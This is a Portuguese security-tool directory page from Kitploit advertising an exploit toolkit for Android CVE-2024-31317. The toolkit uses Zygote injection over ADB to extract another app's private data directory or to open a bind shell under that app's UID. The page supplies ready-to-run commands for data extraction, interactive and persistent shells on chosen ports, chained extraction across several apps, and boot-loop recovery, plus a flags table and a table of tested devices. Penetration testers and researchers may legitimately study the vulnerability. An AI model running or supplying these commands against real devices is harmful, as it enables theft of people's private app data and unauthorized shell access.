Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
zygote-CVE-2024-31317 — Isto é um kit de ferramentas que utiliza CVE-2024-31317 para extrair dados privados de aplicativos via ADB ou gerar um shell com o UID de um aplicativo. | Kitploit
Ferramentas/GitHubGitHub/vnescape/zygote-cve-2024-31317
Segurança AndroidAnálise de VulnerabilidadesExploraçãoExfiltração de DadosTestes de PenetraçãoSegurança Móvel
GitHubvnescape/zygote-cve-2024-31317

zygote-CVE-2024-31317

Isto é um kit de ferramentas que utiliza CVE-2024-31317 para extrair dados privados de aplicativos via ADB ou gerar um shell com o UID de um aplicativo.

Ver Repositório
31há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Zygote Toolkit - CVE-2024-31317

Este é um toolkit que utiliza o CVE-2024-31317 para extrair dados privados de aplicativos via ADB ou gerar um shell com o UID de um aplicativo. Esta vulnerabilidade afeta as versões do Android de 9 a 14 executando o nível de patch de segurança 2024-06-01 ou inferior. Uma matriz de suporte de dispositivos testados pode ser encontrada abaixo.

Pré-requisitos

Debian/Ubuntu (pacotes do sistema)

root@kitploit:~
sudo apt update
sudo apt install adb openjdk-17-jdk-headless android-sdk android-sdk-build-tools
export ANDROID_HOME=/usr/lib/android-sdk
export PATH=$PATH:$ANDROID_HOME/build-tools/34.0.0:$ANDROID_HOME/platform-tools

Adicione as linhas export ao ~/.bashrc (ou equivalente) para persistência.

Verificar

root@kitploit:~
./setup.sh

Início Rápido

root@kitploit:~
# Build and install the carrier APK (auto-builds from source)
python3 cve_2024_31317.py com.google.android.youtube --setup --rebuild -y

# Extract an app's data directory
python3 cve_2024_31317.py -d DEVICE_SERIAL -E -o app_data.tar -y com.example.app

O exploit constrói tudo a partir de Hijack.java e AndroidManifest.xml na primeira execução.

Uso

root@kitploit:~
python3 cve_2024_31317.py [flags] [package]

Modos

Opções

Exemplos

root@kitploit:~
# Extraction
python3 cve_2024_31317.py -d DEVICE -E -o youtube.tar -y com.google.android.youtube

# Check if device is vulnerable
python3 cve_2024_31317.py -d DEVICE --check-vuln

# Interactive bind shell
python3 cve_2024_31317.py -d DEVICE -i -y com.google.android.youtube

# Persistent shell on port 7777
python3 cve_2024_31317.py -d DEVICE -S 7777 -y com.google.android.youtube

# Multi-app chain
python3 cve_2024_31317.py -d DEVICE -E -y --chain-targets "app1,app2,app3"

# Recovery only (fix boot loop)
python3 cve_2024_31317.py -d DEVICE --recover

Construção a partir do Código Fonte

Tudo é construído a partir do código fonte em tempo de execução. O pipeline de construção usa javac (JDK 17+), d8, aapt, zipalign e apksigner do Android SDK.

  • x86_64 → arm64: as ferramentas rodam nativamente; a saída DEX é independente de arquitetura
  • ARM64 → arm64: tudo roda nativamente (Adoptium fornece builds ARM64 do JDK)

Código de Desbloqueio

Se o dispositivo tiver um código de desbloqueio, ele inicia o BFU (Before First Unlock). O exploit consulta sys.user.0.ce_available por até 5 minutos até que você desbloqueie. Recomenda-se remover o código de desbloqueio durante a execução do exploit.

Dispositivos Testados

† Específico do Samsung One UI: a injeção ZNJECT é bem-sucedida e a extração -E funciona, mas o shell vinculado do ServerSocket toybox nc nunca abre. Necessita de mais pesquisa para encontrar a causa raiz do problema.

Recuperação

O payload permanece em hidden_api_blacklist_exemptions pode causar um loop de inicialização no próximo boot. Execute --recover para redefinir:

root@kitploit:~
python3 cve_2024_31317.py -d DEVICE --recover
Baixar ferramenta
FlagDescrição
-EExtrair dados do app via grandchild tar | nc (sobrevive à morte do pai)
-iShell interativo REPL vinculado
-S PORTShell persistente (protocolo FIFO de porta única)
--recoverRedefinir configuração, corrigir travamento na inicialização / degradação do Zygote
--setupConstruir + instalar APK carrier apenas (sem injeção)
--list-appsListar todos os pacotes instalados com UID e tipo sys/user
--check-vulnVerificar se o dispositivo é vulnerável ao CVE-2024-31317 e sair
FlagDescrição
-o file.tarCaminho de saída para o tarball de extração
-y / --yesPular confirmações
--retries NMáximo de tentativas por alvo (padrão 3)
--chain-targets "pkg1,pkg2"Extrair múltiplos apps em uma sessão
--chain-file file.jsonMesmo que acima, a partir de arquivo JSON
--reboot-afterReiniciar após extração (restaura Zygote)
--reboot-every NReiniciar após cada N alvos em cadeia
--coldPular aquecimento; armazenar payload para o próximo lançamento do app
--port PORTPorta do shell vinculado (padrão 8888)
-d SERIALAlvejar dispositivo específico (múltiplos conectados)
--rebuildForçar reconstrução do APK carrier
DispositivoAndroidAPIPatchABI-E-i-S--chain--cold--retries--recover--reboot-after--list-apps--check-vulnPontuação
Google Pixel 312312021-10-05arm64-v8a✅✅✅✅✅✅✅✅✅✅12/12
Samsung SM-P615 Tab S6 Lite13332024-05-01arm64-v8a✅❌†❌†✅✅❌†✅✅✅✅9/12
sdk_gphone_x86_64 (emulator)10292019-09-05x86_64✅✅✅✅✅✅✅✅✅✅12/12